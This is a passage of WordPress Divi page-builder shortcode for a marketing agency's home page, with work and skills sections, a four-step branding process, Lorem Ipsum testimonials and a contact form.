button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just three steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\" hover_enabled=\"0\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\" hover_enabled=\"0\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\" hover_enabled=\"0\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\" hover_enabled=\"0\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\" hover_enabled=\"0\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>\n[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\" hover_enabled=\"0\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>\n[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" 